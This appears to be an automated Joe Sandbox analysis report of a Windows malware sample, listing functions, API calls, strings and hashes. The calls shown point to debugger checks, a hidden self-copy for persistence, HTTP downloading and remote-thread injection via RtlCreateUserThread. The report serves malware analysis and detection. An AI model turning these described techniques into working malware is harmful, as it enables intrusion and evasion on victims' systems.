                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                                                  • Opcode ID: c50ff25f02d0d9740cf6f98af521503889310657cbdea9cda20ac6316b49b85e
                                                                                                                                                                                                                                  • Instruction ID: e1be1e46beff0947f07c960ca94d125c8a8e0dcab7691e7697cf48470443aa57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c50ff25f02d0d9740cf6f98af521503889310657cbdea9cda20ac6316b49b85e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F161E925A08B5383FB74BB20AC5537AA2A4FF44340FC005F6D54E865E5FE2DE5098E65
                                                                                                                                                                                                                                  Function 00007FF72A0240AC Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                                                  • Opcode ID: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction ID: a6d9b8d3c351b2a673d5bd09d73af2052ffab63abe56184afef07485e90677dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531E436A18A8287E760EB15E85072AF760FBD4780F905075EA8E47B68EF7DD4458F10
                                                                                                                                                                                                                                  Function 00007FF72A02388C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF72A02374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: GetVolumeInformationW.KERNELBASE ref: 00007FF72A0237C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: wsprintfW.USER32 ref: 00007FF72A02386A
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238D5
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238EA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238FD
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02390D
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023920
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023935
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023948
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02395D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction ID: c9222580183f347c9cb3cc7b7cba4ce5bf92b7020950768cc2050ce33b3f7ba2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8111F25A28A8786EB70AB25FC6476AA361FBD4744F805071DA4E43E69EF3CD408CB54
                                                                                                                                                                                                                                  Function 00007FF72A023A3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF72A02374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: GetVolumeInformationW.KERNELBASE ref: 00007FF72A0237C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02370C: wsprintfW.USER32 ref: 00007FF72A02386A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A0238FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A023948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72A02388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72A023A71), ref: 00007FF72A02395D
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF72A023A81
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF72A023A8C
                                                                                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF72A023AA5
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF72A023ABD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                  • Opcode ID: be39751b43a88f0d6a23e429432fe74b0459ebc07935f09dc291e70ec118819c
                                                                                                                                                                                                                                  • Instruction ID: 69c9d224bac03d01d9a1c215fcef604f1c76cc4c1d8ca97d3bb74dcbeaae32b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be39751b43a88f0d6a23e429432fe74b0459ebc07935f09dc291e70ec118819c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB016D65A1864793FB70AB24EC543AAA360FB94744FC040B2D64D825E8FE2CD60DCF54
                                                                                                                                                                                                                                  Function 00007FF72A02370C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                  • Opcode ID: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction ID: 39ca2b59bf0664f32cc0e3b3cc964d4d9526a691a09bc548485edd5db2e69cfa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46312C2661C6C686E730DB64E8983ABB3A0FB94700F800176E68D87A58EB3DC409CF15
                                                                                                                                                                                                                                  Function 00007FF72A0231B4 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                                                  • Opcode ID: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction ID: 6f0b4f8162ea767a5906ca6912a24696dc96eab30a49eaea7ead815e5ab11ec4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0DA2590C38387FB306B25AC05379E7A0FB55708F8411F5D59D06594EE6CE50DDF26
                                                                                                                                                                                                                                  Function 00007FF72A0214EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 416 7ff72a0214ec-7ff72a021528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction ID: d36bb6ceaaa1484dc6896fb8822b713e827121013e281547c16bb1a64536cf6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0E09276508F81C6D660AB15FC8001AB7B4FBC8794F904125EBCD42B28DF3CC169CB04
                                                                                                                                                                                                                                  Function 00007FF72A023B1C Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 420 7ff72a023b1c-7ff72a023b42 VirtualAlloc
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 96049b04f01930e4aff45d12f7ff1c72481ede1cf3e6a7e626b6a38427c14eb7
                                                                                                                                                                                                                                  • Instruction ID: f2323c71e9b59f21ce5e9bf85d55365aefe250975975c63341f4bb3c189c01f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96049b04f01930e4aff45d12f7ff1c72481ede1cf3e6a7e626b6a38427c14eb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09C080B5F25141C7D71CDF31E451B0B6A14F744740F904038D64157784D93DC1554F04
                                                                                                                                                                                                                                  Function 00007FF72A023AEC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 417 7ff72a023aec-7ff72a023afb 418 7ff72a023afd-7ff72a023b0a VirtualFree 417->418 419 7ff72a023b10-7ff72a023b14 417->419 418->419
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction ID: e6bf9a9a311b0347ff7d4ca87752a7f2c181ced880aa81d29f58ebc5550e5780
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73D01221F38A4282F7A4AB26EC99726E2A0FBC4744F808075E6CD415A4DF3CC0998F04

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF72A0210D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-721857904
                                                                                                                                                                                                                                  • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction ID: 85fde0c48e776aa5517ad60cdb2bc126937edf026d8b8abc7e37c097a8dfc516
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E871BC3150CB8286F770AB15E8943AAF7A1FB84784F904175D68D86B98EF7CD988CF50
                                                                                                                                                                                                                                  Function 00007FF72A022168 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF72A0221A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                                  • Opcode ID: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction ID: 519322257d45b8f0d4ed7b011c2ca3310d176ec6e3474051bb065d67edd241e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3571FA3651CB8283E760AB54F85472AF760FBC8794F905075EA8E43AA8DF7CD4888F54
                                                                                                                                                                                                                                  Function 00007FF72A02452C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1404942027.00007FF72A021000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF72A020000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1404908479.00007FF72A020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405008344.00007FF72A025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405075432.00007FF72A028000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405100235.00007FF72A029000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1405126227.00007FF72A02B000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff72a020000_443320E440F81953448019.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                                                  • Opcode ID: 482500e96dd0987bd15cea92275c1105989086282f4efcfdaf5ed813befa3f18
